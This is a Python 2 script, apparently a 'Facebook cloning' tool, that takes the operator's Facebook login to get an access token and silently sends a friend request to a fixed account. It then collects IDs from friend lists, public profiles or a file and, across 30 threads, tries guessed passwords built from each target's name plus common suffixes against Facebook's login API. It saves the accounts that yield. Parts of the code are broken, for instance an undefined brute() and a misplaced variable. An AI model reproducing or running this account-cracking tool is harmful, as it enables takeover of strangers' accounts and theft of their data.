#!/usr/bin/python2

#coding=utf-8

#The Credit For This Code Goes To Lucky Teach

#If You Wanna Take Credits For This Code, Please Look Yourself Again...

#Reserved2020

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize

from multiprocessing.pool import ThreadPool

from requests.exceptions import ConnectionError

from mechanize import Browser

reload(sys)

sys.setdefaultencoding('utf8')

br = mechanize.Browser()

br.set\_handle\_robots(False)

br.set\_handle\_refresh(mechanize.\_http.HTTPRefreshProcessor(),max\_time=1)

br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]

def keluar():

print "\x1b[1;91mExit"

os.sys.exit()

def acak(b):

w = 'ahtdzjc'

d = ''

for i in x:

d += '!'+w[random.randint(0,len(w)-1)]+i

return cetak(d)

def cetak(b):

w = 'ahtdzjc'

for i in w:

j = w.index(i)

x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))

x += '\033[0m'

x = x.replace('!0','\033[0m')

sys.stdout.write(x+'\n')

def jalan(z):

for e in z + '\n':

sys.stdout.write(e)

sys.stdout.flush()

time.sleep(0.001)

#Dev:AFTAB

##### LOGO #####

logo = """

\033[1;92m ░(¯`♥´¯)░░░░░

\033[1;93m ░░(¯`♥´¯)░░░░

\033[1;93m ░░░(¯`♥´¯)░░░

\033[1;92m ░░░░(¯`♥´¯)░░

\033[1;97m█❚═══════▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇═══════█❚

\033[1;97m█❚═══════▇▇▇▇▇▇▇▇\033[1;92m𝐀𝐍𝐎𝐍𝐘𝐌𝐔𝐒\_**LUCKY**\_**TEACH**\033[1;97m▇▇▇▇▇▇▇▇═══════█❚

\033[1;97m█❚═══════▇▇▇▇▇▇▇▇\033[1;92m**LUCKY**\_**TEACH**\_**CHANNEL**\033[1;97m▇▇▇▇▇▇▇═══════█❚

\033[1;97m█❚═══════▇▇▇▇▇▇▇▇▇\033[1;92m **INSTAGRAM**//**LUCKYBADSHAH01**\033[1;97m▇▇▇▇▇▇▇▇═══════█❚

\033[1;97m█❚═══════▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇═══════█❚

\033[1;92m ░(¯`♥´¯)░░░░░

\033[1;93m ░░(¯`♥´¯)░░░░

\033[1;93m ░░░(¯`♥´¯)░░░

\033[1;92m ░░░░(¯`♥´¯)░░

"""

def tik():

titik = ['. ','.. ','... ']

for o in titik:

print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)

back = 0

berhasil = []

cekpoint = []

oks = []

id = []

listgrup = []

vulnot = "\033[31mNot Vuln"

vuln = "\033[32mVuln"

os.system("clear")

print """

\033[1;97m❚█═════\033[1;92m࿐LUCKY࿐T࿐E࿐A࿐C࿐H࿐ ࿐L࿐U࿐C࿐K࿐Y࿐

࿐B ࿐A࿐D࿐S࿐H࿐A࿐\033[1;97m═════════█❚

\033[1;93m███╗░░░███╗███████╗███████╗██████╗░░░░░██╗░█████╗░██╗░░██╗███╗░░░███╗░█████╗░██████╗░░░░░██╗██████╗░██████╗░

\033[1;97m████╗░████║██╔════╝██╔════╝██╔══██╗░░░██╔╝██╔══██╗██║░░██║████╗░████║██╔══██╗██╔══██╗░░░██╔╝██╔══██╗██╔══██╗

\033[1;93m██╔████╔██║█████╗░░█████╗░░██████╔╝░░██╔╝░███████║███████║██╔████╔██║███████║██║░░██║░░██╔╝░██████╔╝██████╦╝

\033[1;93m██║╚██╔╝██║██╔══╝░░██╔══╝░░██╔══██╗░██╔╝░░██╔══██║██╔══██║██║╚██╔╝██║██╔══██║██║░░██║░██╔╝░░██╔══██╗██╔══██╗

\033[1;97m██║░╚═╝░██║███████╗███████╗██║░░██║██╔╝░░░██║░░██║██║░░██║██║░╚═╝░██║██║░░██║██████╔╝██╔╝░░░██║░░██║██████╦╝

\033[1;93m╚═╝░░░░░╚═╝╚══════╝╚══════╝╚═╝░░╚═╝╚═╝░░░░╚═╝░░╚═╝╚═╝░░╚═╝╚═╝░░░░░╚═╝╚═╝░░╚═╝╚═════╝░╚═╝░░░░╚═╝░░╚═╝╚═════╝░

\033[1;97m❚█═════\033[1;92m࿐LUCKY࿐T࿐E࿐A࿐C࿐H࿐ ࿐L࿐U࿐C࿐K࿐Y࿐

࿐B ࿐A࿐D࿐S࿐H࿐A࿐\033[1;97m═════════█❚

\033[1;95m🙨🙮❖▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅❖🙬🙨

\033[1;95m🙨🙮❖⬘════════════════════════════════════════════════════════════════════════⬙❖🙬🙨

\033[1;91m🙨█❚═══════ ═══════█❚ \033[1;93m🙨

\033[1;91m🙨█❚════════▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇═══════█❚\033[1;93m🙨

\033[1;91m🙨█❚═══════ ═══════█❚\033[1;93m🙨

\033[1;97m────────────────────────────────────────────────────────────────────────────────────

\033[1;97m─██████████████─██████──██████─██████──────────██████─██████████████─████████████───

\033[1;97m─██░░░░░░░░░░██─██░░██──██░░██─██░░██████████████░░██─██░░░░░░░░░░██─██░░░░░░░░████─

\033[1;97m─██░░██████░░██─██░░██──██░░██─██░░░░░░░░░░░░░░░░░░██─██░░██████░░██─██░░████░░░░██─

\033[1;92m─██░░██──██░░██─██░░██──██░░██─██░░██████░░██████░░██─██░░██──██░░██─██░░██──██░░██─

\033[1;92m─██░░██████░░██─██░░██████░░██─██░░██──██░░██──██░░██─██░░██████░░██─██░░██──██░░██─

\033[1;92m─██░░░░░░░░░░██─██░░░░░░░░░░██─██░░██──██░░██──██░░██─██░░░░░░░░░░██─██░░██──██░░██─

\033[1;92m─██░░██████░░██─██░░██████░░██─██░░██──██████──██░░██─██░░██████░░██─██░░██──██░░██─

\033[1;92m─██░░██──██░░██─██░░██──██░░██─██░░██──────────██░░██─██░░██──██░░██─██░░██──██░░██─

\033[1;97m─██░░██──██░░██─██░░██──██░░██─██░░██──────────██░░██─██░░██──██░░██─██░░████░░░░██─

\033[1;97m─██░░██──██░░██─██░░██──██░░██─██░░██──────────██░░██─██░░██──██░░██─██░░░░░░░░████─

\033[1;97m─██████──██████─██████──██████─██████──────────██████─██████──██████─████████████───

\033[1;97m────────────────────────────────────────────────────────────────────────────────────

\033[1;91m🙨█❚═══════ ═══════█❚╏\033[1;93m🙨

\033[1;91m🙨█❚════════▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇═══════█❚\033[1;93m🙨

\033[1;91m🙨█❚═══════ ═══════█❚\033[1;93m🙨

\033[1;95m🙨🙮❖⬘════════════════════════════════════════════════════════════════════════⬙❖🙬🙨

\033[1;95m🙨🙮❖▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅❖🙬🙨

"""

CorrectUsername = "AFTAB"

CorrectPassword = "BADSHAH"

loop = 'true'

while (loop == 'true'):

username = raw\_input("\033[1;96m[🙮] \x1b[1;93mUsername Of Tool \x1b[1;96m🙬 ")

if (username == CorrectUsername):

password = raw\_input("\033[1;96m[🙮] \x1b[1;93mPassword Of Tool \x1b[1;96m🙬 ")

if (password == CorrectPassword):

print "Logged in successfully as " + username

loop = 'false'

else:

print "Wrong Password"

os.system('xdg-open <https://www.youtube.com/channel/UCx9BzZgR65pO16lcKssyc5Q>)

else:

print "Wrong Username"

os.system('xdg-open <https://www.youtube.com/channel/UCx9BzZgR65pO16lcKssyc5Q>)

def login():

os.system('clear')

try:

toket = open('login.txt','r')

menu()

except (KeyError,IOError):

os.system('clear')

print logo

print 42\*"\033[1;96m="

print('\033[1;96m[🙤] \x1b[1;93mLOGIN WITH FACEBOOK \x1b[1;96m[🙦]' )

id = raw\_input('\033[1;96m[◘] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')

pwd = raw\_input('\033[1;96m[◘] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')

tik()

try:

br.open('https://m.facebook.com')

except mechanize.URLError:

print"\n\033[1;96m[⮽] \x1b[1;91mThere is no internet connection"

keluar()

br.\_factory.is\_html = True

br.select\_form(nr=0)

br.form['email'] = id

br.form['pass'] = pwd

br.submit()

url = br.geturl()

if 'save-device' in url:

try:

sig= 'api\_key=882a8490361da98702bf97a021ddc14dcredentials\_type=passwordemail='+id+'format=JSONgenerate\_machine\_id=1generate\_session\_cookies=1locale=en\_USmethod=auth.loginpassword='+pwd+'return\_ssl\_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'

data = {"api\_key":"882a8490361da98702bf97a021ddc14d","credentials\_type":"password","email":id,"format":"JSON", "generate\_machine\_id":"1","generate\_session\_cookies":"1","locale":"en\_US","method":"auth.login","password":pwd,"return\_ssl\_resources":"0","v":"1.0"}

x=hashlib.new("md5")

x.update(sig)

a=x.hexdigest()

data.update({'sig':a})

url = "https://api.facebook.com/restserver.php"

r=requests.get(url,params=data)

z=json.loads(r.text)

unikers = open("login.txt", 'w')

unikers.write(z['access\_token'])

unikers.close()

print '\n\x1b[1;36;40m[☑] Login Successful...'

os.system('xdg-open <https://www.youtube.com/channel/UCx9BzZgR65pO16lcKssyc5Q>')

requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access\_token='+z['access\_token'])

menu()

except requests.exceptions.ConnectionError:

print"\n\x1b[1;91m[⮽] There is no internet connection"

keluar()

if 'checkpoint' in url:

print("\n\x1b[1;92m[※] Your Account is on Checkpoint")

os.system('rm -rf login.txt')

time.sleep(1)

keluar()

else:

print("\n\x1b[1;93mPassword/Email is wrong")

os.system('rm -rf login.txt')

time.sleep(1)

login()

def menu():

os.system('clear')

try:

toket=open('login.txt','r').read()

except IOError:

os.system('clear')

print"\x1b[1;91m[!] Token invalid"

os.system('rm -rf login.txt')

time.sleep(1)

login()

try:

otw = requests.get('https://graph.facebook.com/me?access\_token='+toket)

a = json.loads(otw.text)

nama = a['name']

id = a['id']

ots = requests.get('https://graph.facebook.com/me/subscribers?access\_token=' + toket)

b = json.loads(ots.text)

sub = str(b['summary']['total\_count'])

except KeyError:

os.system('clear')

print"\033[1;91mYour Account is on Checkpoint"

os.system('rm -rf login.txt')

time.sleep(1)

login()

except requests.exceptions.ConnectionError:

print"\x1b[1;92mThere is no internet connection"

keluar()

os.system("clear")

print logo

print " \033[1;33;40m⁜ [1] \033[1;33;40m⦿ Let's Start Clone"

print " \033[1;33;40m⁜ [2] \033[1;33;40m⦿ UPdate Tool"

print " \033[1;33;40m⁜ [0] \033[1;33;40m⦿ LogouT"

pilih()

def pilih():

unikers = raw\_input("\n\033[1;31;40m 🙮◘⁃◘🙬 \033[1;35;40m")

if unikers =="":

print "\x1b[1;91mFill in correctly"

pilih()

elif unikers =="1":

super()

elif unikers =="2":

os.system('clear')

print logo

print " \033[1;36;40m 🙨🙮❖▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅❖🙬🙨\n"

os.system('git pull origin master')

raw\_input('\n\x1b[1;91m[ \x1b[1;97m▷⁃◁Back \x1b[1;91m]')

menu()

elif unikers =="0":

jalan('Token Removed')

os.system('rm -rf login.txt')

keluar()

else:

print "\x1b[1;91mFill in correctly"

pilih()

def super():

global toket

os.system('clear')

try:

toket=open('login.txt','r').read()

except IOError:

print"\x1b[1;91mToken invalid"

os.system('rm -rf login.txt')

time.sleep(1)

login()

os.system('clear')

print logo

print " \x1b[1;33;40m [1] \033[1;33;40m ⦿Start From Friendlist"

print " \x1b[1;33;40m [2] \033[1;33;40m ⦿Start From Public ID"

print " \x1b[1;33;40m [3] \033[1;33;40m ⦿Start Bruteforce"

print " \x1b[1;33;40m [4] \033[1;33;40m ⦿Start From File"

print " \x1b[1;33;40m [0] \033[1;33;40m ▷⁃◁Back"

pilih\_super()

def pilih\_super():

peak = raw\_input("\n\033[1;31;40m 🙮◘⁃◘🙬 \033[1;97m")

if peak =="":

print "\x1b[1;91mFill in correctly"

pilih\_super()

elif peak =="1":

os.system('clear')

print logo

jalan('\033[1;93m[⛞] Getting IDs \033[1;97m...')

r = requests.get("https://graph.facebook.com/me/friends?access\_token="+toket)

z = json.loads(r.text)

for s in z['data']:

id.append(s['id'])

elif peak =="2":

os.system('clear')

print logo

idt = raw\_input(" \033[1;96m[💠] Enter ID : ")

try:

jok = requests.get("https://graph.facebook.com/"+idt+"?access\_token="+toket)

op = json.loads(jok.text)

print" \033[1;31;40m[💠] Name : "+op["name"]

except KeyError:

print"\x1b[1;92m[💠] ID Not Found!"

raw\_input("\n\033[1;96m[\033[1;94mBack\033[1;96m]")

super()

print" \033[1;35;40m[⛞] Getting IDs..."

r = requests.get("https://graph.facebook.com/"+idt+"/friends?access\_token="+toket)

z = json.loads(r.text)

for i in z['data']:

id.append(i['id'])

elif peak =="3":

os.system('clear')

print logo

brute()

elif peak =="4":

os.system('clear')

print logo

try:

idlist = raw\_input('\x1b[1;96m[♢] \x1b[1;93mEnter the file name \x1b[1;91m: \x1b[1;97m')

for line in open(idlist,'r').readlines():

id.append(line.strip())

except IOError:

print '\x1b[1;35;40m[!] \x1b[1;35;40mFile not found'

raw\_input('\n\x1b[1;35;40m[ \x1b[1;35;40mExit \x1b[1;35;40m]')

super()

elif peak =="0":

menu()

else:

print "\x1b[1;91mFill in correctly"

pilih\_super()

print " \033[1;36;40m[ 🙨🙮❖⬘⬙❖🙬🙨] Total IDs : \033[1;94m"+str(len(id))

jalan(' \033[1;34;40m[ 🙨🙮❖⬘⬙❖🙬🙨] Please Wait...')

titik = ['. ','.. ','... ']

for o in titik:

print(" \r\033[1;32;40m [ 🙨🙮❖⬘⬙❖🙬🙨] Cloning\033[1;93m"+o),;sys.stdout.flush();time.sleep(1)

print "\n\033[1;93m ❈ \x1b[1;97mTo Stop Process Press CTRL+Z \033[1;94m ❈"

print " \033[1;92m🙨🙮❖▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅❖🙬🙨"

jalan(' \033[1;97mStart cloning Wait...')

print " \033[1;92m🙨🙮❖▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅▅❖🙬🙨"

def main(arg):

global cekpoint,oks

user = arg

try:

os.mkdir('out')

except OSError:

pass

try:

a = requests.get('https://graph.facebook.com/'+user+'/?access\_token='+toket)

b = json.loads(a.text)

pass1 = b['first\_name'] + '786'

data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email="+(user)+"&locale=en\_US&password="+(pass1)+"&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")

q = json.load(data)

if 'access\_token' in q:

print ' \x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass1 + ' ✔ ' + b['name']

oks.append(user+pass1)

else:

if 'www.facebook.com' in q["error\_msg"]:

print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass1 + ' ✔ ' + b['name']

cek = open("out/CP.txt", "a")

cek.write(user+"|"+pass1+"\n")

cek.close()

cekpoint.append(user+pass1)

else:

pass2 = b['first\_name'] + '123'

data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email="+(user)+"&locale=en\_US&password="+(pass2)+"&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")

q = json.load(data)

if 'access\_token' in q:

print ' \x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass2 + ' ✔ ' + b['name']

oks.append(user+pass2)

else:

if 'www.facebook.com' in q["error\_msg"]:

print ' \x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass2 + ' ✔ ' + b['name']

cek = open("out/CP.txt", "a")

cek.write(user+"|"+pass2+"\n")

cek.close()

cekpoint.append(user+pass2)

else:

pass3 = b['first\_name'] + '12345'

data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email="+(user)+"&locale=en\_US&password="+(pass3)+"&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")

q = json.load(data)

if 'access\_token' in q:

print ' \x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass3 + ' ✔ ' + b['name']

oks.append(user+pass3)

else:

if 'www.facebook.com' in q["error\_msg"]:

print ' \x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass3 + ' ✔ ' + b['name']

cek = open("out/CP.txt", "a")

cek.write(user+"|"+pass3+"\n")

cek.close()

cekpoint.append(user+pass4)

else:

pass4 = b['first\_name'] + '1234'

data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email="+(user)+"&locale=en\_US&password="+(pass4)+"&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")

q = json.load(data)

if 'access\_token' in q:

print ' \x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass4 + ' ✔ ' + b['name']

oks.append(user+pass4)

else:

if 'www.facebook.com' in q["error\_msg"]:

print ' \x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass4 + ' ✔ ' + b['name']

cek = open("out/CP.txt", "a")

cek.write(user+"|"+pass4+"\n")

cek.close()

cekpoint.append(user+pass4)

else:

pass5 = '786786'

data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email="+(user)+"&locale=en\_US&password="+(pass5)+"&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")

q = json.load(data)

if 'access\_token' in q:

print ' \x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass5 + ' ✔ ' + b['name']

oks.append(user+pass5)

else:

if 'www.facebook.com' in q["error\_msg"]:

print ' \x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass5 + ' ✔ ' + b['name']

cek = open("out/CP.txt", "a")

cek.write(user+"|"+pass5+"\n")

cek.close()

cekpoint.append(user+pass5)

else:

pass6 = b['last\_name'] + '123'

data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email="+(user)+"&locale=en\_US&password="+(pass6)+"&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")

q = json.load(data)

if 'access\_token' in q:

print ' \x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass6 + ' ✔ ' + b['name']

oks.append(user+pass6)

else:

if 'www.facebook.com' in q["error\_msg"]:

print ' \x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass6 + ' ✔ ' + b['name']

cek = open("out/CP.txt", "a")

cek.write(user+"|"+pass6+"\n")

cek.close()

cekpoint.append(user+pass6)

else:

pass7 = 'Pakistan'

data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email="+(user)+"&locale=en\_US&password="+(pass7)+"&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")

q = json.load(data)

if 'access\_token' in q:

print ' \x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass7 + ' ✔ ' + b['name']

oks.append(user+pass7)

else:

if 'www.facebook.com' in q["error\_msg"]:

print ' \x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass7 + ' ✔ ' + b['name']

cek = open("out/CP.txt", "a")

cek.write(user+"|"+pass7+"\n")

cek.close()

cekpoint.append(user+pass7)

except:

pass

p = ThreadPool(30)

p.map(main, id)

print 42\*"\033[1;96m="

print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Has Been Completed \033[1;97m....'

print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))

print("\033[1;96m[+] \033[1;92mCP File Has Been Saved \033[1;91m: \033[1;97mout/checkpoint.txt")

raw\_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")

menu()

if \_\_name\_\_ == '\_\_main\_\_':

login()